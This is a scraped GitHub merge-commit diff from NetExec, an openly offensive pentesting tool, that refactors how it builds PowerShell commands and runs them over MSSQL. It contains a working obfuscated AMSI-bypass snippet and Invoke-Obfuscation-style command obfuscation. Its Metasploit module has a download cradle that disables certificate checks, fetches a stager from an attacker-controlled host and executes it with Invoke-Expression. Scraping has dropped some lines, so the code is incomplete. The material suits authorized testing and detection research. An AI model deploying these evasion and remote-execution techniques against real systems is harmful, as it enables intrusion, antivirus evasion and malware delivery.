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Merge pull request #296 from Pennyw0rth/marshall-pwsh-update
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Refactor/fix/update PowerShell and related features
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Marshall-Hallenbeck authored May 20, 2024
2 parents d0a4afe + 23a7d11 commit cf231d5
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Showing 11 changed files with 245 additions and 168 deletions.
98 changes: 45 additions & 53 deletions nxc/helpers/
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Expand Up @@ -12,6 +12,20 @@

obfuscate_ps_scripts = False

def replace_singles(s):
"""Replaces single quotes with a double quote
We do this because quoting is very important in PowerShell, and we are doing multiple layers:
Python, MSSQL, and PowerShell. We want to make sure that the command is properly quoted at each layer.
s (str): The string to replace single quotes in.
str: Original string with single quotes replaced with double.
return s.replace("'", r"\"")

def get_ps_script(path):
"""Generates a full path to a PowerShell script given a relative path.
Expand Down Expand Up @@ -108,91 +122,66 @@ def obfs_ps_script(path_to_script):

def create_ps_command(ps_command, force_ps32=False, dont_obfs=False, custom_amsi=None):
def create_ps_command(ps_command, force_ps32=False, obfs=False, custom_amsi=None, encode=True):
Generates a PowerShell command based on the provided `ps_command` parameter.
ps_command (str): The PowerShell command to be executed.
force_ps32 (bool, optional): Whether to force PowerShell to run in 32-bit mode. Defaults to False.
dont_obfs (bool, optional): Whether to obfuscate the generated command. Defaults to False.
obfs (bool, optional): Whether to obfuscate the generated command. Defaults to False.
custom_amsi (str, optional): Path to a custom AMSI bypass script. Defaults to None.
encode (bool, optional): Whether to encode the generated command (executed via -enc in PS). Defaults to True.
str: The generated PowerShell command.
nxc_logger.debug(f"Creating PS command parameters: {ps_command=}, {force_ps32=}, {obfs=}, {custom_amsi=}, {encode=}")

if custom_amsi:
nxc_logger.debug(f"Using custom AMSI bypass script: {custom_amsi}")
with open(custom_amsi) as file_in:
lines = list(file_in)
amsi_bypass = "".join(lines)
amsi_bypass = """[Net.ServicePointManager]::ServerCertificateValidationCallback = {$true}
[Ref].Assembly.GetType('Sys'+'tem.Man'+'agement.Aut'+'omation.Am'+'siUt'+'ils').GetField('am'+'siIni'+'tFailed', 'NonP'+'ublic,Sta'+'tic').SetValue($null, $true)

command = amsi_bypass + f"\n$functions = {{\n function Command-ToExecute\n {{\n{amsi_bypass + ps_command}\n }}\n}}\nif ($Env:PROCESSOR_ARCHITECTURE -eq 'AMD64')\n{{\n $job = Start-Job -InitializationScript $functions -ScriptBlock {{Command-ToExecute}} -RunAs32\n $job | Wait-Job\n}}\nelse\n{{\n IEX \"$functions\"\n Command-ToExecute\n}}\n" if force_ps32 else amsi_bypass + ps_command
amsi_bypass = ""

# for readability purposes, we do not do a one-liner
if force_ps32: # noqa: SIM108
command = amsi_bypass + f"$functions = {{function Command-ToExecute{{{amsi_bypass + ps_command}}}}}; if ($Env:PROCESSOR_ARCHITECTURE -eq 'AMD64'){{$job = Start-Job -InitializationScript $functions -ScriptBlock {{Command-ToExecute}} -RunAs32; $job | Wait-Job | Receive-Job }} else {{IEX '$functions'; Command-ToExecute}}"
command = f"{amsi_bypass} {ps_command}"

nxc_logger.debug(f"Generated PS command:\n {command}\n")

# We could obfuscate the initial launcher using Invoke-Obfuscation but because this function gets executed
# concurrently it would spawn a local powershell process per host which isn't ideal, until I figure out a good way
# of dealing with this it will use the partial python implementation that I stole from GreatSCT
# ( <3

if is_powershell_installed():
temp = tempfile.NamedTemporaryFile(prefix='nxc_',
encoding_types = [1,2,3,4,5,6]
while True:
encoding = random.choice(encoding_types)
invoke_obfs_command = 'powershell -C \'Import-Module {};Invoke-Obfuscation -ScriptPath {} -Command "ENCODING,{}" -Quiet\''.format(get_ps_script('invoke-obfuscation/Invoke-Obfuscation.psd1'),,
out = check_output(invoke_obfs_command, shell=True).split('\n')[4].strip()
command = 'powershell.exe -exec bypass -noni -nop -w 1 -C "{}"'.format(out)
nxc_logger.debug('Command length: {}'.format(len(command)))
if len(command) <= 8192:
if not dont_obfs:
if obfs:
nxc_logger.debug("Obfuscating PowerShell command")
obfs_attempts = 0
while True:
command = f'powershell.exe -exec bypass -noni -nop -w 1 -C "{invoke_obfuscation(command)}"'
nxc_logger.debug(f"Obfuscation attempt: {obfs_attempts + 1}")
obfs_command = invoke_obfuscation(command)

command = f'powershell.exe -exec bypass -noni -nop -w 1 -C "{replace_singles(obfs_command)}"'
if len(command) <= 8191:

if obfs_attempts == 4:
nxc_logger.error(f"Command exceeds maximum length of 8191 chars (was {len(command)}). exiting.")

nxc_logger.debug(f"Obfuscation length too long with {len(command)}, trying again...")
obfs_attempts += 1
command = f"powershell.exe -noni -nop -w 1 -enc {encode_ps_command(command)}"
# if we arent encoding or obfuscating anything, we quote the entire powershell in double quotes, otherwise the final powershell command will syntax error
command = f"-enc {encode_ps_command(command)}" if encode else f'"{command}"'
command = f"powershell.exe -noni -nop -w 1 {command}"

if len(command) > 8191:
nxc_logger.error(f"Command exceeds maximum length of 8191 chars (was {len(command)}). exiting.")

nxc_logger.debug(f"Final command: {command}")
return command

Expand Down Expand Up @@ -320,6 +309,7 @@ def invoke_obfuscation(script_string):
str: The obfuscated payload for execution.
nxc_logger.debug(f"Command before obfuscation: {script_string}")
random_alphabet = "".join(random.choice([i.upper(), i]) for i in ascii_lowercase)
random_delimiters = ["_", "-", ",", "{", "}", "~", "!", "@", "%", "&", "<", ">", ";", ":", *list(random_alphabet)]

Expand Down Expand Up @@ -436,5 +426,7 @@ def invoke_obfuscation(script_string):
choice(["", " "]) + new_script + choice(["", " "]) + "|" + choice(["", " "]) + invoke_expression,

return choice(invoke_options)
obfuscated_script = choice(invoke_options)
nxc_logger.debug(f"Script after obfuscation: {obfuscated_script}")
return obfuscated_script

44 changes: 22 additions & 22 deletions nxc/modules/
Original file line number Diff line number Diff line change
Expand Up @@ -27,6 +27,8 @@ def options(self, context, module_options):
SRVPORT Stager port
RAND Random string given by metasploit (if using web_delivery)
SSL Stager server use https or http (default: https)
This module is compatable with --obfs, --force-ps32 (PowerShell execution options)
multi/handler method that don't require RAND:
Set LHOST and LPORT (called SRVHOST and SRVPORT in nxc module options)
Expand All @@ -35,8 +37,11 @@ def options(self, context, module_options):
Web Delivery Method (exploit/multi/script/web_delivery):
Set target 2 (PSH)
Set payload to what you want (windows/meterpreter/reverse_https, etc)
after running, copy the end of the URL printed (e.g. M5LemwmDHV) and set RAND to that
check compatabile payloads with `show payloads`
Optional: SET URIPATH {custom}
After running, copy the end of the URL printed (e.g. M5LemwmDHV) and set RAND to that, or whatever you set URIPATH to
self.met_ssl = "https"

Expand All @@ -53,24 +58,19 @@ def options(self, context, module_options):
self.srvport = module_options["SRVPORT"]

def on_admin_login(self, context, connection):
# stolen from
command = """$url="{}://{}:{}/{}"
$DownloadCradle ='[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {{$true}};$client = New-Object Net.WebClient;$client.Proxy=[Net.WebRequest]::GetSystemWebProxy();$client.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;Invoke-Expression $client.downloadstring('''+$url+'''");'
if([Environment]::Is64BitProcess) {{ $PowershellExe='powershell.exe'}}
$ProcessInfo = New-Object System.Diagnostics.ProcessStartInfo
$ProcessInfo.Arguments="-nop -c $DownloadCradle"
$ProcessInfo.UseShellExecute = $False
$ProcessInfo.RedirectStandardOutput = $True
$ProcessInfo.CreateNoWindow = $True
$ProcessInfo.WindowStyle = "Hidden"
$Process = [System.Diagnostics.Process]::Start($ProcessInfo)""".format(
"http" if self.met_ssl == "http" else "https",
connection.ps_execute(command, force_ps32=True)
context.log.success("Executed payload")
proto = "http" if self.met_ssl == "http" else "https"
metasploit_endpoint = f"{proto}://{self.srvhost}:{self.srvport}/{self.rand}"

# use single quotes inside because if we run this in 32bit PowerShell, the entire command is double quoted (see helpers/
command = f"$ProgressPreference = 'SilentlyContinue'; [System.Net.ServicePointManager]::ServerCertificateValidationCallback = {{$true}};$client = New-Object Net.WebClient;$client.Proxy=[Net.WebRequest]::GetSystemWebProxy();$client.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;Invoke-Expression $client.downloadstring('{metasploit_endpoint}');"
context.log.debug(f"Running command via ps_execute: {command}")

output = connection.ps_execute(command)
context.log.debug(f"Received output from ps_execute: {output}")

if output and "Unable to connect to the remote server" in output:
context.log.error("Executed payload, but the cradle was unable to download the stager, is the Metasploit server running?")
context.log.success("Executed payload")
69 changes: 41 additions & 28 deletions nxc/protocols/
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Expand Up @@ -2,6 +2,7 @@
import random
import socket
import contextlib
from io import StringIO

from nxc.config import process_secret
from nxc.connection import connection
Expand Down Expand Up @@ -300,42 +301,54 @@ def mssql_query(self):

def execute(self, payload=None, get_output=False):
if not payload and self.args.execute:
payload = self.args.execute

if not self.args.no_output:
get_output = True"Command to execute: {payload}")
payload = self.args.execute if not payload and self.args.execute else payload
if not payload:
self.logger.error("No command to execute specified!")
return None

get_output = True if not self.args.no_output else get_output

exec_method = MSSQLEXEC(self.conn, self.logger)
raw_output = exec_method.execute(payload, get_output)
output = exec_method.execute(payload)
self.logger.debug(f"Output: {output}")
except Exception as e:"Execute command failed, error: {e!s}")
return False
self.logger.success("Executed command via mssqlexec")
if raw_output:
for line in raw_output:
return raw_output
self.logger.success("Executed command via mssqlexec")
output_lines = StringIO(output).readlines()
for line in output_lines:
return output

def ps_execute(
if not payload and self.args.ps_execute:
payload = self.args.ps_execute
if not self.args.no_output:
get_output = True

# We're disabling PS obfuscation by default as it breaks the MSSQLEXEC execution method
ps_command = create_ps_command(payload, force_ps32=force_ps32, dont_obfs=dont_obfs)
return self.execute(ps_command, get_output)
def ps_execute(self, payload=None, get_output=False, methods=None, force_ps32=False, obfs=False, encode=False):
payload = self.args.ps_execute if not payload and self.args.ps_execute else payload
if not payload:
self.logger.error("No command to execute specified!")
return None

response = []
obfs = obfs if obfs else self.args.obfs
encode = encode if encode else not self.args.no_encode
force_ps32 = force_ps32 if force_ps32 else self.args.force_ps32
get_output = True if not self.args.no_output else get_output

self.logger.debug(f"Starting PS execute: {payload=} {get_output=} {methods=} {force_ps32=} {obfs=} {encode=}")
amsi_bypass = self.args.amsi_bypass[0] if self.args.amsi_bypass else None
self.logger.debug(f"AMSI Bypass: {amsi_bypass}")

if os.path.isfile(payload):
self.logger.debug(f"File payload set: {payload}")
with open(payload) as commands:
response = [self.execute(create_ps_command(c.strip(), force_ps32=force_ps32, obfs=obfs, custom_amsi=amsi_bypass, encode=encode), get_output) for c in commands]
response = [self.execute(create_ps_command(payload, force_ps32=force_ps32, obfs=obfs, custom_amsi=amsi_bypass, encode=encode), get_output)]

self.logger.debug(f"ps_execute response: {response}")
return response

def put_file(self):
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